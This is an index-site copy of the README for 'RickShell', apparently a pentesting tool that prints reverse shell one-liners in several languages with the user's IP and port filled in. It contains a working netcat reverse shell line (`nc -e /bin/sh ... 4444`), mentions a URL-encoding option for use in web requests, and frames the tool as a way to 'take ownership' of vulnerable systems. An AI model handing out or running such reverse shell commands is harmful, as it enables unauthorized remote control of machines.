An open API service indexing awesome lists of open source software.

https://github.com/rickidevs/rickshell

tool that includes reverse shell commands and presents them to you easily. Readme for more details
https://github.com/rickidevs/rickshell

cybersecurity-tool oneliner-shell reverse-shell reverseshell rickidevs shell shell-script

Last synced: 10 months ago
JSON representation

tool that includes reverse shell commands and presents them to you easily. Readme for more details

Awesome Lists containing this project

README

          


RickPhis



# 🧬 RickShell

use one of the reverse shell commands in this tool to take ownership of the system when you find a vulnerability that you can exploit ;-)

## 📸 Screenshot


RickPhis

## 💡 HOW TO USE

`RickShell` command gives you the **top 10** most used shells. The tool will automatically type your ip address and a suitable port into the command.

### The following arguments can be used:

- `RickShell -p netcat` *netcat reverse shell commands.*

- `RickShell -p bash` *bash reverse shell commands.*

- `RickShell -p php` *php reverse shell commands.*

- `RickShell -p python` *python reverse shell commands.*

- `RickShell -p java` *java reverse shell commands.*

- `RickShell -p powershell` *powershell reverse shell commands.*

- `RickShell -p telnet` *telnet reverse shell commands.*

---
_these commands automatically assign your ip address and port. 🪄_
- e.g: `nc -e /bin/sh 192.168.100.23 4444 `

_but if you want to use a different ip and port, you can use the following arguments_

- `RickShell -ip 192.168.1.1 --port 4242`
- `RickShell -p bash -ip 192.168.1.1 --port 4242` etc.
---
#### 🌐 if you are going to use it in the url, use the following command. this sets your shell command for the url (-ue)

- `RickShell -ue` / `RickShell -p bash -ue` /
- `RickShell -ip 192.168.1.1 --port 4242 -ue` etc.

---

## 📜 Installation

`git clone https://github.com/Rickidevs/RickShell.git`

`cd RickShell`

`chmod +x setup.sh`

`./setup.sh`

---

## ⚖️ Disclaimer

_you are fully responsible for legal or illegal use. remember that this tool is designed for education_

---